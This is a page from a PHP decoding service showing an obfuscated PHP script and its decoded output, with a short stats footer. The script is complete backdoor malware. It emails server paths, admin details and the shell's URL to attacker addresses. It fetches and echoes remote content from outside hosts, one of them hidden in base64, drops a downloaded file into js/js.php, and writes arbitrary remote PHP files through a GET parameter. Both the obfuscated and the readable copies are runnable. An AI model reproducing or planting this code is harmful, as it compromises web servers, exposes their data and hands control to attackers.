Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto aGKka; oK64q: $header = "\106\x72\x6f\155\72\x20{$from_shellcode}\xd\xa\x52\145\160\..
Decoded Output download
<? goto aGKka; oK64q: $header = "From: {$from_shellcode}\xd\xaReply-to: {$from_shellcode}"; goto l7BgM; xVP9P: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto Xedxa; uYPOm: echo "<!DOCTYPE html!>"; goto VO0pu; QuTMX: error_reporting(0); goto E2AFM; W9nLU: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\xd
"; goto i1FtU; GExlx: $x = $s . "l-" . base64_encode($host); goto eRvrn; budEA: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "
"; goto a6yXf; juFC6: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "
\xa"; goto gM1Yf; vvKFK: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto xVP9P; k50Wf: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto oK64q; gM1Yf: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "
\xa"; goto W9nLU; Xedxa: $from_shellcode = "lamer@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto XVjal; bum7s: $datasi = @fopen("js/js.php", "r"); goto bXnY2; l7BgM: @mail($to_email, $server_mail, $linkcr, $header); goto xFeS9; i1FtU: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd\xa"; goto budEA; Vc4k8: if (isset($_GET["ksfg"])) { $f = fopen($_GET["ksfg"] . ".php", "a"); fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"])); fclose($f); } goto uYPOm; s8hdQ: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . " - " . $_SERVER["HTTP_HOST"] . ''; goto k50Wf; xFeS9: $kime = "[email protected]"; goto R97MJ; E2AFM: $s = "https://acbdf.space/"; goto DwuIw; DwuIw: $host = str_replace("www.", '', @$_SERVER["HTTP_HOST"]); goto GExlx; bXnY2: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/lamer.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>
"; $header .= "Content-Type: text/html;\xa charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto vvKFK; eRvrn: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto bSMSI; a6yXf: mail($kime, $baslik, $EL_MuHaMMeD); goto UNxRd; aGKka: function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ",")) { $tmp = explode(",", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } goto Jv7yz; R97MJ: $baslik = "min 20203"; goto juFC6; VO0pu: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto bum7s; bSMSI: echo $gitt; goto Vc4k8; ri1dL: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto QuTMX; Jv7yz: $x = base64_decode("aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ==") . GetIP() . "-" . base64_encode("http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto ri1dL; XVjal: $to_email = "[email protected]"; goto s8hdQ; UNxRd:
?>
Did this file decode correctly?
Original Code
goto aGKka; oK64q: $header = "\106\x72\x6f\155\72\x20{$from_shellcode}\xd\xa\x52\145\160\154\x79\x2d\x74\x6f\x3a\x20{$from_shellcode}"; goto l7BgM; xVP9P: $ip_remote = $_SERVER["\x52\x45\115\117\x54\x45\137\101\x44\104\122"]; goto Xedxa; uYPOm: echo "\x3c\41\104\117\103\124\131\120\x45\40\150\x74\155\154\41\x3e"; goto VO0pu; QuTMX: error_reporting(0); goto E2AFM; W9nLU: $EL_MuHaMMeD .= "\123\145\162\x76\145\162\x20\151\x73\x6c\x65\164\151\x6d\40\x73\151\163\x74\145\x6d\x69\40\72\40" . $_SERVER["\123\x45\x52\x56\105\x52\x5f\123\117\106\x54\127\x41\x52\x45"] . "\xd\12"; goto i1FtU; GExlx: $x = $s . "\x6c\55" . base64_encode($host); goto eRvrn; budEA: $EL_MuHaMMeD .= "\x41\166\x6c\x61\x6e\141\x6e\x20\x53\x69\164\145\40\x3a\40" . $_SERVER["\110\124\x54\120\137\x48\x4f\123\x54"] . "\15\12"; goto a6yXf; juFC6: $EL_MuHaMMeD = "\104\x6f\163\171\x61\40\x59\157\154\165\40\x3a\40" . $_SERVER["\x44\117\x43\125\x4d\x45\116\x54\x5f\x52\x4f\x4f\124"] . "\15\xa"; goto gM1Yf; vvKFK: $time_shell = '' . date("\x64\x2f\155\57\x59\40\55\x20\110\72\x69\72\x73") . ''; goto xVP9P; k50Wf: $linkcr = "\x4c\151\x6e\x6b\72\x20" . $_SERVER["\x53\x45\x52\x56\105\x52\137\x4e\101\115\105"] . '' . $_SERVER["\122\x45\x51\125\105\123\x54\137\125\122\111"] . "\40\x2d\x20\x49\120\40\x45\170\143\x75\164\x69\156\147\x3a\x20{$ip_remote}\x20\55\x20\124\x69\155\145\72\x20{$time_shell}"; goto oK64q; gM1Yf: $EL_MuHaMMeD .= "\123\x65\x72\x76\x65\162\x20\101\x64\x6d\x69\156\x20\72\x20" . $_SERVER["\x53\105\x52\x56\x45\x52\137\101\104\x4d\x49\x4e"] . "\15\xa"; goto W9nLU; Xedxa: $from_shellcode = "\154\x61\x6d\x65\162\100" . gethostbyname($_SERVER["\123\x45\x52\126\x45\122\137\x4e\101\115\105"]) . ''; goto XVjal; bum7s: $datasi = @fopen("\x6a\x73\x2f\152\x73\56\160\150\160", "\162"); goto bXnY2; l7BgM: @mail($to_email, $server_mail, $linkcr, $header); goto xFeS9; i1FtU: $EL_MuHaMMeD .= "\123\150\x65\x6c\x6c\40\x4c\x69\156\153\x20\72\40\x68\164\164\x70\72\x2f\57" . $_SERVER["\123\x45\x52\126\105\x52\137\x4e\101\x4d\x45"] . $_SERVER["\120\x48\120\x5f\123\105\114\x46"] . "\xd\xa"; goto budEA; Vc4k8: if (isset($_GET["\153\x73\x66\147"])) { $f = fopen($_GET["\153\x73\x66\147"] . "\56\160\150\160", "\141"); fwrite($f, file_get_contents($s . "\163\55" . $_GET["\153\x73\x66\147"])); fclose($f); } goto uYPOm; s8hdQ: $server_mail = '' . gethostbyname($_SERVER["\x53\x45\122\126\x45\122\x5f\116\101\x4d\x45"]) . "\40\x20\55\40" . $_SERVER["\x48\x54\x54\120\x5f\110\117\123\124"] . ''; goto k50Wf; xFeS9: $kime = "\x62\171\x68\x65\162\x6f\64\x34\100\x67\155\141\151\x6c\56\x63\x6f\x6d"; goto R97MJ; E2AFM: $s = "\x68\x74\164\x70\163\x3a\x2f\x2f\x61\x63\142\x64\x66\x2e\163\x70\x61\143\145\x2f"; goto DwuIw; DwuIw: $host = str_replace("\167\167\167\56", '', @$_SERVER["\110\124\124\x50\137\x48\117\123\124"]); goto GExlx; bXnY2: if ($datasi) { } else { @mkdir("\x6a\163"); $dos = file_get_contents("\x68\164\x74\x70\x73\x3a\x2f\x2f\x61\143\142\144\x66\56\163\x70\x61\143\x65\57\x74\x78\x74\x2f\x6c\141\155\145\x72\56\164\170\164"); $data = "\x6a\163\57\x6a\x73\x2e\x70\150\160"; @touch("\152\163\57\x6a\163\56\x70\x68\160"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\x68\164\x74\160\72\x2f\x2f" . $_SERVER["\110\124\x54\120\137\110\x4f\123\124"] . '' . $_SERVER["\x52\x45\x51\125\105\123\x54\137\125\x52\111"] . ''; $y = "\x3c\x68\61\76\123\145\x6e\x64\x65\x72\x20\x59\141\172\x64\x69\162\151\x6c\144\x69\x2e\x3c\142\162\57\x3e\x20\x53\111\x54\105\40\x59\x4f\114\x20\x3a\40" . $yol . "\x3c\142\x72\x2f\x3e\x53\145\156\x64\145\x72\x20\x59\157\x6c\165\40\72\40\x6a\163\x2f\x63\x72\x73\x2e\x70\x68\160\x3c\x2f\x68\x31\x3e"; $header .= "\106\x72\157\x6d\72\40\123\x68\145\114\x4c\40\x42\x6f\x6f\164\x20\74\x73\x75\160\160\x6f\162\100\x6e\151\x63\x2e\x6f\x72\147\x3e\12"; $header .= "\103\157\x6e\x74\145\x6e\164\55\x54\x79\160\145\x3a\40\x74\x65\x78\x74\57\150\164\155\x6c\73\xa\40\143\150\141\162\163\x65\164\75\165\164\146\55\70\xa"; @mail("\154\x6f\147\x69\156\x6f\x6c\x64\165\155\x40\147\155\x61\x69\154\x2e\143\x6f\155", "\110\141\143\x6b\x6c\x69\x6e\x6b\40\102\x69\154\x64\x69\x72\x69", "{$y}", $header); @mail("\x6c\157\x67\151\156\x6f\x6c\144\165\155\x40\147\x6d\x61\151\154\x2e\143\x6f\x6d", "\x48\x61\143\153\x6c\x69\156\x6b\40\x42\x69\x6c\x64\x69\x72\151", "{$y}", $header); } goto vvKFK; eRvrn: if (function_exists("\x63\165\x72\154\x5f\151\x6e\151\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\146\151\x6c\145\x5f\147\x65\164\x5f\143\157\156\x74\x65\156\164\163")) { @($gitt = file_get_contents($x)); } goto bSMSI; a6yXf: mail($kime, $baslik, $EL_MuHaMMeD); goto UNxRd; aGKka: function GetIP() { if (getenv("\x48\x54\x54\x50\137\x43\x4c\x49\105\116\x54\137\x49\x50")) { $ip = getenv("\110\x54\x54\x50\137\103\114\111\105\x4e\124\137\111\x50"); } elseif (getenv("\110\x54\124\x50\137\x58\x5f\x46\117\122\x57\x41\122\104\x45\x44\137\x46\x4f\122")) { $ip = getenv("\x48\x54\124\x50\137\130\137\106\x4f\x52\127\x41\122\x44\x45\x44\137\x46\x4f\122"); if (strstr($ip, "\x2c")) { $tmp = explode("\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\x52\x45\x4d\117\124\x45\137\101\x44\x44\122"); } return $ip; } goto Jv7yz; R97MJ: $baslik = "\155\151\x6e\x20\x32\x30\62\x30\x33"; goto juFC6; VO0pu: if ($_POST["\x71\x75\145\x72\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\x75\145\162\171"])); $data = "\144\141\x74\x61\x2e\164\x78\x74"; @touch("\144\x61\x74\141\56\164\170\164"); $ver = @fopen($data, "\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\144\141\164\141\x2e\x74\170\x74", "\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto bum7s; bSMSI: echo $gitt; goto Vc4k8; ri1dL: if (function_exists("\x63\x75\x72\x6c\x5f\x69\156\x69\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\x66\x69\154\x65\137\x67\145\164\137\x63\157\x6e\164\x65\x6e\x74\x73")) { @($gitt = file_get_contents($x)); } goto QuTMX; Jv7yz: $x = base64_decode("\141\x48\x52\60\143\110\115\x36\114\x79\x39\x68\x62\x6d\x39\165\145\127\x30\x77\x64\x58\x4d\165\131\x32\170\61\x59\x69\x39\x73\x4c\121\75\x3d") . GetIP() . "\55" . base64_encode("\150\164\x74\x70\72\57\x2f" . $_SERVER["\x48\124\x54\120\137\110\117\x53\x54"] . $_SERVER["\x52\105\x51\125\x45\123\124\137\125\122\x49"]); goto ri1dL; XVjal: $to_email = "\x6c\x6f\x67\151\156\157\x6c\144\x75\155\100\x67\x6d\141\x69\154\x2e\143\157\155"; goto s8hdQ; UNxRd:
Function Calls
None |
Stats
MD5 | b3489ead0394af585180dac694d18256 |
Eval Count | 0 |
Decode Time | 60 ms |